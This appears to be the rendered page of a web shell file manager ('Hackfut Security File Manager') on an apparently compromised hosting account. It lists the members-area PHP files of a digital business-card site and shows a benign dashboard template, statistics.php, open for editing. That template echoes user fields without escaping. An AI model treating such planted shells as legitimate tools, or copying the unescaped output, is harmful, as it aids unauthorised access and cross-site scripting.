Hackfut Security File Manager
Current Path:
/home/u126195517/domains/rddvc.com/public_html/members
home
/
u126195517
/
domains
/
rddvc.com
/
public_html
/
members
/
📁
..
📁
assets
📄
bank.php
(4.65 KB)
📄
bank_form.php
(1.83 KB)
📄
bio.php
(3.01 KB)
📄
bio_form.php
(1.9 KB)
📄
breadcrumb.php
(250 B)
📄
brochure_download_kriya.php
(676 B)
📄
brochures.php
(4.47 KB)
📄
brochures_form.php
(2.54 KB)
📄
change_dvc_color.php
(7.48 KB)
📄
change_dvc_color_form.php
(23.01 KB)
📄
change_dvc_design.php
(2.94 KB)
📄
change_dvc_design_links.php
(2.95 KB)
📄
changepassword.php
(6.39 KB)
📄
changepasswordform.php
(1.89 KB)
📄
counter.php
(1.88 KB)
📄
cover_image.php
(3.05 KB)
📄
cover_image_form.php
(4.58 KB)
📁
cssphp
📄
diamond.php
(23.79 KB)
📄
disp_pln_amt.js
(454 B)
📄
enquiry.php
(4.13 KB)
📄
enquiry_form.php
(837 B)
📄
final_dvc.php
(2.74 KB)
📄
final_dvc_qrlink.php
(3.13 KB)
📄
final_dvc_qrlink_form.php
(6.09 KB)
📄
final_payment.php
(11.18 KB)
📄
final_payment_form.php
(1.52 KB)
📄
footer.php
(312 B)
📄
gallery.php
(2.8 KB)
📄
gallery_form.php
(3.8 KB)
📄
get_discount_rate.php
(1.24 KB)
📄
get_plan_amount.php
(1.05 KB)
📄
gold.php
(15.13 KB)
📄
googlereview.php
(3.04 KB)
📄
googlereview_form.php
(1.99 KB)
📄
header.php
(1.99 KB)
📄
movetop.php
(806 B)
📄
myprofile.php
(3.2 KB)
📄
payment-failed.php
(96 B)
📄
payment-success.php
(1.01 KB)
📄
payment.php
(3.16 KB)
📄
payment_link.php
(6.29 KB)
📄
products.php
(2.81 KB)
📄
products_form.php
(8.18 KB)
📄
profile_form.php
(10.99 KB)
📄
redeemcoupon.js
(1.17 KB)
📄
renewal.php
(6.5 KB)
📄
renewal_form.php
(2.16 KB)
📄
scripts.php
(1.46 KB)
📄
sidebar_diamond.php
(3.18 KB)
📄
sidebar_gold.php
(2.69 KB)
📄
social_links.php
(3.06 KB)
📄
social_links_form.php
(5.84 KB)
📄
statistics.php
(4.31 KB)
📄
tax_info.php
(3.03 KB)
📄
tax_info_form.php
(2.08 KB)
📄
user_forgot_password.php
(3.62 KB)
📄
user_new_password.php
(6.55 KB)
📄
youtube_links.php
(2.81 KB)
📄
youtube_links_form.php
(3.4 KB)
Editing: statistics.php
<div class="row"> <div class="col-xl-6 pr-xl-2"> <div class="row"> <div class="col-sm-6 pr-sm-2 statistics-grid"> <div class="card card_border border-primary-top p-4"> <i class="lnr lnr-user"> </i> <h3 class="text-primary number" style="text-transform:capitalize"><?php echo isset($row['login_name']) ? $row['login_name'] : ''; ?></h3> <p class="stat-text">https://www.rddvc.com/<?php echo isset($row['login_name']) ? $row['login_name'] : ''; ?> </p> </div> </div> <div class="col-sm-6 pl-sm-2 statistics-grid"> <div class="card card_border border-primary-top p-4"> <i class="lnr lnr-database"> </i> <h3 class="text-secondary number" style="text-transform:capitalize"><?php echo isset($row['rddvc_plan']) ? $row['rddvc_plan'] : ''; ?></h3> <p class="stat-text">Renewal Date: <?php echo isset($row['login_renew_date']) ? $row['login_renew_date'] : ''; ?> </p> </div> </div> </div> </div> <div class="col-xl-6 pl-xl-2"> <div class="row"> <div class="col-sm-6 pr-sm-2 statistics-grid"> <div class="card card_border border-primary-top p-4"> <i class="lnr lnr-eye"> </i> <h3 class="text-success number"><span id="viewCount">Loading...</span></h3> <p class="stat-text">Visitors</p> </div> </div> <div class="col-sm-6 pl-sm-2 statistics-grid"> <div class="card card_border border-primary-top p-4"> <i class="lnr lnr-bullhorn"> </i> <h3 class="text-danger number"><span id="shareCount">Loading...</span></h3> <p class="stat-text">DVC Shared</p> </div> </div> </div> </div> </div> <script> function fetchDVCViews() { // Assuming you have the userid variable defined somewhere in your code var userid = <?php echo json_encode($row['user_id']); ?>; // Replace with the actual user ID value // Fetch record count from the server fetch('assets/kiryacontrolers/user_view_counter.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', // Adjusted content type }, body: 'userid=' + encodeURIComponent(userid), // Use URL-encoded form data }) .then(response => response.json()) .then(data => { console.log('Response from server:', data); if (data.success) { // Update the record count on the page document.getElementById('viewCount').textContent = data.count; } else { console.error(data.message); } }) .catch(error => console.error('Error fetching record count:', error)); } // Fetch record count initially fetchDVCViews(); // Refresh every minute setInterval(fetchDVCViews, 60000); </script> <script> function fetchShareDvc() { // Assuming you have the userid variable defined somewhere in your code var userid = <?php echo json_encode($row['user_id']); ?>; // Fetch record count from the server fetch('assets/kiryacontrolers/user_dvc_share_counter.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', // Adjusted content type }, body: 'userid=' + encodeURIComponent(userid), // Use URL-encoded form data }) .then(response => response.json()) .then(data => { console.log('Response from server:', data); // Log the response for debugging if (data.success) { // Update the record count on the page document.getElementById('shareCount').textContent = data.count; } else { console.error(data.message); } }) .catch(error => console.error('Error fetching record count:', error)); } // Fetch record count initially fetchShareDvc(); // Refresh every minute setInterval(fetchShareDvc, 60000); </script>
Upload File
Create Folder